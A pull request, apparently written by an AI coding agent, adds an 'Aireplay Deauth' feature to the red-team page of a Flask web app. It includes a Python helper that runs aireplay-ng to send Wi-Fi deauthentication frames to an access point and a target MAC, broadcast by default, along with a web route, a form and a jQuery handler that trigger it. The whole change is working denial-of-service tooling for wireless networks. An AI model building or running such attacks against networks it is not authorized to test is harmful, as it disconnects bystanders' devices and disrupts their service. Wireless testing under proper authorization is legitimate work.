### PR TITLE
Add aireplay-ng deauth feature

### DIFF
--- a/README.md
+++ b/README.md
@@ -17,6 +17,8 @@ wireless and wired adapters.
   MAC addresses and SSID to mimic other devices.
 - **Red‑Team section** – a set of experimental tools including DoS and broadcast
   flood examples that operate on a selected interface.
+- **Aireplay-ng integration** – optionally send deauth frames via the external
+  `aireplay-ng` utility if it is installed.
 
 ## Setup
 

--- a/app.py
+++ b/app.py
@@ -301,6 +301,29 @@ def deauth_route():
         return jsonify({'status': 'error', 'message': f'Deauth error: {str(e)}'}), 500
 
 
+@app.route('/aireplay-deauth', methods=['POST'])
+def aireplay_deauth_route():
+    data = request.form
+    selected_interface = data.get('selectedInterface')
+    ap_mac = data.get('ap')
+    target_mac = data.get('target') or 'ff:ff:ff:ff:ff:ff'
+    frames = data.get('frames')
+
+    if not selected_interface or not ap_mac or not frames:
+        return jsonify({'status': 'error', 'message': 'Missing required parameters'}), 400
+
+    try:
+        frames = int(frames)
+    except ValueError:
+        return jsonify({'status': 'error', 'message': 'Frames must be an integer'}), 400
+
+    try:
+        from scripts.wifi.aireplay import deauth as aireplay_deauth
+        output = aireplay_deauth(ap_mac, target_mac, selected_interface, frames)
+        return jsonify({'status': 'success', 'message': output})
+    except Exception as e:
+        return jsonify({'status': 'error', 'message': f'Aireplay error: {str(e)}'}), 500
+
 if __name__ == '__main__':
     host = '0.0.0.0'
     port = 8080

--- a/scripts/wifi/aireplay.py
+++ b/scripts/wifi/aireplay.py
@@ -1,0 +1,28 @@
+import subprocess
+from typing import Optional
+
+
+def deauth(ap_mac: str, target_mac: str, iface: str, frames: int = 1) -> str:
+    """Send deauthentication frames using aireplay-ng."""
+    cmd = [
+        "aireplay-ng",
+        "-0",
+        str(frames),
+        "-a",
+        ap_mac,
+        "-c",
+        target_mac,
+        iface,
+    ]
+    try:
+        result = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            check=True,
+        )
+    except FileNotFoundError as e:
+        raise RuntimeError("aireplay-ng not found") from e
+    except subprocess.CalledProcessError as e:
+        raise RuntimeError(f"aireplay-ng failed: {e.stderr.strip()}") from e
+    return result.stdout.strip()

--- a/static/js/red-team-scripts.js
+++ b/static/js/red-team-scripts.js
@@ -238,4 +238,58 @@ $(document).ready(function () {
             }
         });
     });
+
+    $("#Aireplay-Deauth-Submit").on("click", function(event) {
+        event.preventDefault();
+
+        var $apInput = $("#Aireplay-Deauth-AP");
+        var $targetInput = $("#Aireplay-Deauth-Target");
+        var $framesInput = $("#Aireplay-Deauth-Frames");
+        var ap = $apInput.val();
+        var target = $targetInput.val() || "ff:ff:ff:ff:ff:ff";
+        var frames = $framesInput.val();
+        var selectedInterface = $("#interface-select-AireplayDeauth").val();
+
+        if (!ap || !frames) {
+            if (!ap) { $apInput.addClass("input-error"); }
+            if (!frames) { $framesInput.addClass("input-error"); }
+            return;
+        }
+
+        var $submitButton = $("#Aireplay-Deauth-Submit");
+        var originalButtonClass = $submitButton.attr('class');
+        var originalButtonStyle = $submitButton.attr('style');
+        var originalButtonText = $submitButton.text();
+
+        $.ajax({
+            url: "/aireplay-deauth",
+            type: "POST",
+            data: {
+                ap: ap,
+                target: target,
+                frames: frames,
+                selectedInterface: selectedInterface
+            },
+            beforeSend: function() {
+                $submitButton.prop("disabled", true);
+                $submitButton.attr('class', 'spinner-border text-primary');
+                $submitButton.text('');
+                $apInput.removeClass("input-error");
+                $framesInput.removeClass("input-error");
+            },
+            success: function(response) {
+                console.log(response);
+            },
+            error: function(error) {
+                console.log(error);
+            },
+            complete: function() {
+                $submitButton.attr('class', originalButtonClass);
+                $submitButton.attr('style', originalButtonStyle);
+                $submitButton.text(originalButtonText);
+                $submitButton.prop("disabled", false);
+            }
+        });
+    });
+
 });

--- a/templates/attacks/_aireplayDeauth.html
+++ b/templates/attacks/_aireplayDeauth.html
@@ -1,0 +1,12 @@
+<div class="card m-3" style="width: 18rem;">
+  <h5 class="card-title">Aireplay Deauth</h5>
+  <p class="card-text">Use aireplay-ng to send deauth frames.</p>
+  <form class="form-inline" method="post" action="/aireplay-deauth">
+      <input type="text" id="Aireplay-Deauth-AP" class="form-control mb-2" placeholder="AP MAC" name="ap">
+      <input type="text" id="Aireplay-Deauth-Target" class="form-control mb-2" placeholder="Target MAC" name="target">
+      <input type="text" id="Aireplay-Deauth-Frames" class="form-control mb-2" placeholder="1" name="frames">
+      {% set selectId = 'AireplayDeauth' %}
+      {% include '_adapters-list.html' %}
+      <button id="Aireplay-Deauth-Submit" class="btn btn-primary mb-2">Submit</button>
+  </form>
+</div>

--- a/templates/red-team.html
+++ b/templates/red-team.html
@@ -5,6 +5,7 @@
   {% include 'attacks/_broadcastAttack.html' %}
   {% include 'attacks/_beaconAdvertise.html' %}
   {% include 'attacks/_deauth.html' %}
+  {% include 'attacks/_aireplayDeauth.html' %}
 </div>
 
 </body>


### PR DESCRIPTION
## Summary
- add new `scripts/wifi/aireplay.py` helper for aireplay-ng deauth packets
- expose `/aireplay-deauth` route in the Flask app
- provide form and JS handler for Aireplay deauth
- include the new feature in the red team page and README

## Testing
- `python -m py_compile scripts/wifi/aireplay.py app.py`
- `pytest -q`

------
https://chatgpt.com/codex/tasks/task_e_6853294b229c832fbc6b4215ec70d75e